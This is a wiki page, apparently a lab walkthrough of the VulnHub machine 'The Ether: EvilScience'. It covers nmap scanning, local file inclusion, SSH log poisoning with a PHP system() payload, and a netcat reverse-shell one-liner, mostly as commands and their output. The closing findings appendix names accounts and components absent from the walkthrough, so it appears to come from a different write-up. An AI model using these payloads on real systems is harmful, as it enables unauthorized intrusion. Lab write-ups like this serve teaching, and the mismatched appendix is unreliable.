BlakSec

Revision as of 21:43, 10 May 2018

Objective

The goal is to find out what The Ether is up to. You will be required to break into their server, root the machine, and retrieve the flag. The flag will contain more information about The Ether’s ominous operations regarding this medicine.

Source: [VulnHub.com]

Status: [Completed]

Methodology

Discovery

root@kali:# Nmap 7.60 scan initiated Tue Apr 24 07:34:52 2018 as: nmap -O -p- -sT -sV -T5 -o nmap.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:36:82:0F (Oracle VirtualBox virtual NIC)

Entry Point #1 - Port 80 (HTTP)

Enumeration

Nothing interesting turned up for nikto scan.

Nothing interesting turned up after performing dirb with directory-list-1.0.txt list.

Checking out the website source revealed a LFI opportunity so let's focus on that for now

Exploitation

Assessing if the file include functionality expecting specific files or is it open to path modification

root@kali:# curl -s http://192.168.56.102/?file=research.php |grep "What was the Human Genome"
      <h4>What was the Human Genome Project?</h4>
      <h4>What was the Human Genome Project?</h4>

root@kali:# curl -s http://192.168.56.102/?file=../public_html/research.php |grep "What was the Human Genome"
      <h4>What was the Human Genome Project?</h4>
      <h4>What was the Human Genome Project?</h4>

Pass traversal works so at least the app does not have any sort of checks for specific file names. But is it true for any files?

root@kali:# curl -s http://192.168.56.102/?file=/etc/passwd |grep root

Nope :(

How about something other than /etc?

root@kali:# curl -v -s -G --data-urlencode file=/sbin/ifconfig -o lfi.txt http://192.168.56.102
root@kali:# strings lfi.txt |grep ifconfig
  ifconfig [-a] [-v] [-s] <interface> [[<AF>] <address>]
ifconfig: option `%s' not recognised.
ifconfig: `--help' gives usage information.
ifconfig: Error resolving '%s' for broadcast
ifconfig: Error resolving '%s' for dstaddr

How about logs area?

root@kali:# curl -v -s -G --data-urlencode file=/var/log/lastlog -o lfi.txt http://192.168.56.102
root@kali:# strings lfi.txt |head -5
Ztty1
Ztty1

root@kali:# curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.102 |less
May  4 06:48:09 theEther sshd[1939]: pam_unix(sshd:auth): check pass; user unknown
May  4 06:48:10 theEther sshd[1939]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.200
May  4 06:48:11 theEther sshd[1939]: Failed password for invalid user

Perfect! We can include /var/log/auth.log (which, by the way, reflects my failed ssh logins).

Time for some good old SSH Poisoning technique.

A word of caution - you can inject many fun commands via <? system(..) ?> call but beware that one mishap will render your auth.log unusable (think broken PHP). While this is something that can be easily fixed in your lab environment - just revert your VM to the last Snapshot, in real world pentesting scenario you'll lose a valuable point of entry!

ssh '<?php system($_GET['cmd']); ?>'@192.168.56.106
'<?php system($_GET['cmd']); ?>'@192.168.56.106's password:
<Ctrl>-C

Now let's try including auth.log again, this time passing an arbitrary command to it

# curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="ls -altr /var/tmp" http://192.168.56.106 |less
....
drwxr-xr-x 23 root root 4.0K Nov 22 19:28 ..
drwxrwxrwt  2 root root 4.0K May  4 05:01 VMwareDnD
drwxrwxrwt  2 root root 4.0K May  4 05:01 .font-unix
drwxrwxrwt  2 root root 4.0K May  4 05:01 .XIM-unix
drwxrwxrwt  2 root root 4.0K May  4 05:01 .X11-unix
drwxrwxrwt  2 root root 4.0K May  4 05:01 .Test-unix
drwxrwxrwt  2 root root 4.0K May  4 05:01 .ICE-unix
drwx------  3 root root 4.0K May  4 05:01 systemd-private-3d5770dbd5104a3c9698f04d0c7e41c3-systemd-timesyncd.service-hu1BO3
drwxrwxrwt  9 root root 4.0K May  4 14:39 .
....

Ok! Time for real deal - let's get a reverse shell up and running!

Window #1:

root@kali:# nc -lt -p 4444

Window #2:

root@kali:# curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106

Window #1: You should now get a shell

root@kali:# nc -lt -p 4444
/bin/sh: 0: can't access tty; job control turned off
$
$ ls
about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py
$ pwd
/var/www/html/theEther.com/public_html
$ hostname
theEther
$ clear
TERM environment variable not set.
$ whoami
www-data

Appendix A: Vulnerability Detail and Mitigation

Weak passwords
Rating	High
Description	The password for WordPress admin account is the same as username (admin:admin)
Impact	These types of passwords are very easy to guess
Remediation	Enforce stronger password policies. A strong password should be at least 8 characters, should not contain any personal information, including user id, it should not contain any words spelled correctly and it should contain numbers, letters, and special characters.

Password Reuse
Rating	High
Description	User 'unclestinky" was found to reuse the same password between mysql and system logins.
Impact	Password reuse is a practice which should be highly discouraged and prevented to the extent possible as it potentially allows an increase in attack surface. In this case, the impact is amplified by the fact that an attacker who was able to extract user credentials from mysql database would be able to reuse said credentials to gain access to user's system account.
Remediation	Policies need to be put in place to enforce the use of unique passwords. The use of password managers should be encouraged to aid users in utilizing unique passwords across various systems.

Patch Management
Rating	High
Description	Website contains a number of plug-ins with known vulnerabilities.
Impact	A combination of unpatched components and weak authentication allows an attacker to upload arbitrary scripts and files to the system which can be then loaded via the website allowing an attacker to execute arbitrary commands to escalate access, exfil data, or otherwise damage the system.
Remediation	All assets should be kept current with latest patches and updates. This can be achieved with native tools (e.g. built-in auto-update functionality) or third party applications.

Access Escalation
Rating	High
Description	'sudo' is improperly configured for 'mrderp' account
Impact	An attacker who manages to compromise this account will be able to execute arbitrary commands with 'root' access.
Remediation	Do not allow executing commands as 'root' which are located in user home directory or any location where these can be modified by a non-root user.

Default Install Locations
Rating	Low
Description	PHPMyAdmin was discovered at the default install path
Impact	Using default path/locations makes it easier for attackers to locate components
Remediation	Use non-standard naming convention where possible.

If you have any questions feel free to hit me up on twitter @blaksec

BlakSec

Difference between revisions of "The Ether: EvilScience (v1.0.1) - Walkthrough"

Revision as of 21:43, 10 May 2018

Contents